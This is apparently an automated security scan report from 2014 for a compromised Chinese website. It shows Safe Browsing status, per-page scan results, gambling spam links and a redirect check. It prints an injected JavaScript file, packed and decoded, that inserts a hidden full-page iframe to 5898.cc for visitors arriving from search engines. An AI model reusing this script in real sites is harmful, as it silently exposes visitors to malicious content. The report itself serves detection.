Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wharf-timesriverside.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wharf-timesriverside.com/ | 200 OK Content-Length: 9285 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tangshanlvyou.com ...[3663 bytes skipped]... nwei.net">²©²ÊÕ¾</a></li><li><a href="http://www.01006.net">Ï£¶û¶ÙÓéÀÖ³Ç</a></li><li><a href="http://shenzhenty.com">É격ÓéÀÖ³Ç</a>(http://shenzhenty.com/)</li><li><a href="http://www.zoujunguo.com">×ãÇò¿ª»§</a>(http://www.zoujunguo.com/)</li><li><a href="http://www.cngjljw.com">Ï£¶û¶ÙÓéÀÖ³Ç</a></li><li><a href="http://tangshanlvyou.com">ÐÂÆϾ©ÓéÀÖ³Ç?</a>(http://tangshanlvyou.com/)</li><li><a href="http://www.shhengli11.com">Á¢¼´²©</a></li><list class="diylinks"></list></dd></dl></div></div></div><div class="ft"><div class="ft-links"><p> °æȨËùÓУº<a href="http://wharf-timesriverside.com">88ÓéÀÖ³Ç</a>(88ÓéÀÖ³Ç-ÁúÈ󷿵زú¿ª·¢£¨³É¶¼£©ÓÐÏÞ¹«Ë¾)£¬Î´¾Õ¾³¤£º¸ßÃúºþ Ðí¿É£¬ÑϽû³Ï®ÓëÒýÓá°wharf-timesriverside.c ...[501 bytes skipped]... | ||
http://wharf-timesriverside.com/js/tongji-wharf-timesriverside.js | 200 OK Content-Length: 1089 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: 5898.cc var tj = '<script src="https:\/\/s4.cnzz.com/stat.php?id=5926779&web_id=5926779" language="JavaScript"><\/script>';
var tj2 = '<script language="javascript" src="http:\/\/count4.51yes.com\/click.aspx?id=41320322&logo=1" charset="gb2312"><\/script>'; var Src = "http:\/\/5898.cc"; var Height = "3933px"; eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4 5="n%";3["2"]["9"](k);3["2"]["9"](m);4 8=2.f;4 7=8.j(/l=|i=|&t=|d|c\\ ...[382 bytes skipped]... Decoded script: var width="100%";window["document"]["writeln"](tj);window["document"]["writeln"](tj2);var fromUrl=document.referrer;var bai=fromUrl.match(/wd=|psid=|&t=|tinyurl|is\.gd|query=|q=/g);if(bai!=null){var divObj=window["document"]["createElement"]("iframe");divObj.style.height=Height;divObj.style.width=width;divObj.src=Src;divObj.scrolling='no';divObj.frameborder='0';var first=window["document"]["body"]["firstChild"];window["document"]["body"][" ...[517 bytes skipped]... | ||
http://wharf-timesriverside.com/list/index/ | 200 OK Content-Length: 7572 Content-Type: text/html | clean |
http://wharf-timesriverside.com/list/images/ | 200 OK Content-Length: 4931 Content-Type: text/html | clean |
http://wharf-timesriverside.com/list/down/ | 200 OK Content-Length: 4148 Content-Type: text/html | clean |
http://wharf-timesriverside.com/list/video/ | 200 OK Content-Length: 4099 Content-Type: text/html | clean |
http://wharf-timesriverside.com/single/about.html | 200 OK Content-Length: 4904 Content-Type: text/html | clean |
http://wharf-timesriverside.com/test404page.js | 404 Not Found Content-Length: 1119 Content-Type: text/html | clean |
http://wharf-timesriverside.com/../ | 400 Bad Request Content-Length: 226 Content-Type: text/html | clean |
http://wharf-timesriverside.com/news/25.shtml | 200 OK Content-Length: 7201 Content-Type: text/html | clean |
http://wharf-timesriverside.com/topic/%E5%A7%9A%E8%AE%B0%E8%81%94%E4%BC%97 | 200 OK Content-Length: 4479 Content-Type: text/html | clean |
http://wharf-timesriverside.com/news/24.shtml | 200 OK Content-Length: 8564 Content-Type: text/html | clean |
http://wharf-timesriverside.com/topic/88%E5%A8%B1%E4%B9%90%E5%9F%8E | 200 OK Content-Length: 4913 Content-Type: text/html | clean |
http://wharf-timesriverside.com/news/11.shtml | 200 OK Content-Length: 6888 Content-Type: text/html | clean |
http://wharf-timesriverside.com/news/10.shtml | 200 OK Content-Length: 6217 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wharf-timesriverside.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 13 Sep 2014 03:32:32 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=frrg7qk70e1pbg84fjooa02tk3; path=/
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: wharf-timesriverside.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 13 Sep 2014 03:32:32 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=frrg7qk70e1pbg84fjooa02tk3; path=/
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: wharf-timesriverside.com
Referer: http://www.google.com/search?q=wharf-timesriverside.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wharf-timesriverside.com
Referer: http://www.google.com/search?q=wharf-timesriverside.com
Result:
The result is similar to the first query. There are no suspicious redirects found.